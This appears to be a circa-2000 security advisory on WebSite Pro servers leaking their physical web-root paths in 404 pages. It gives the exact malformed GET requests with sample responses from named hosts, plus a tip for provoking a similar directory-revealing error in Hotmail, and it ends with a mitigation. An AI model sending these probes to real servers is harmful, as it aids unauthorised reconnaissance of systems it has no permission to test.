|
Vulnerability WebSite Pro Affected WebSitePro 2.3.18 Description Lark Lizerman found following. WebSite Pro is also revealing the webdirectory of each Website by a simple command line. This bug is similar to the "IIS revealing webdirectories" bug reported. On WebSitePro the diference ist the way you retrieve the path. Example (Made with MS Windows Telnet Client): Logfile: ======== GET /HTTP1.0\ <------ Our command we send via Telnet on port 80 to the webserver Response: Content-length: 186 <HTML><HEAD><TITLE>Document Moved</TITLE></HEAD> <BODY bgcolor="White"><H2>Document Moved</H2> This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here </A>.<P> </BODY></HTML> GET /HTTP1.0/ Content-length: 230 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White"><H2>404 Not Found</H2> The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P> </BODY></HTML> Here it shows us, that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs. It's not a large threat but an attacker might gain information about the server which should stay in Admin's hands. On all Webservers e.g. MS IIS and Apache the response is "error 404". A tip from Noah Rathaus about WebSite Pro latest version(2.4.9). He mentioned a server where WebSite Pro. 2.4.9 is run. He discovered, that also the latest version is vulnerable to the bug of revealing webdirectories. In the new version there must be made a change to retrieve the directoryname. When you connect to a server send the command line: GET /HTTP1.0 \ You have now to add a space before the last backspace of the commandline. That makes the server respond with a "404" error and and prints the directoryname. Here is the part from the logfile of Windows Telnet Client (website.oreilly.com): GET /HTTP1.0 \ HTTP/1.0 404 Not Found Date: Thu, 13 Jan 2000 20:47:12 GMT Server: WebSitePro/2.4.9 Accept-ranges: bytes Content-type: text/html Content-length: 216 <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD> <BODY bgcolor="White"><H2>404 Not Found</H2> The requested URL was not found on this server:<P><CODE>/HTTP1.0<P>(c:\1Web\docs\website\HTTP1.0)</CODE><P> </BODY></HTML> Here it shows us the directory "c:\1Web\docs\website\". Hotmail? Get into your Hotmail account. After you are logged in, modify in the string address the part with "disk=216.33.148.68_" in something like "disk="abc.beh.doh.cih_". Put string text in the place of the IP address. It will give you a nice error revealing directory structure of server and you will be able to understand after this a big part of address string. Solution Vendor contacted and informed about the bug. Expecting statement about fix. Every version of website (1.x, 2.x) seen behaves like this in standard configuration. However you can avoid the revealing of webdirectories by installing either one of two freely available WSAPI extensions which then send out custom 404, 403 and 401 messages. For more information see: http://software.oreilly.com/techsupport/kb/website_kb_article_display_frame.cfm?ID_KBArticle=102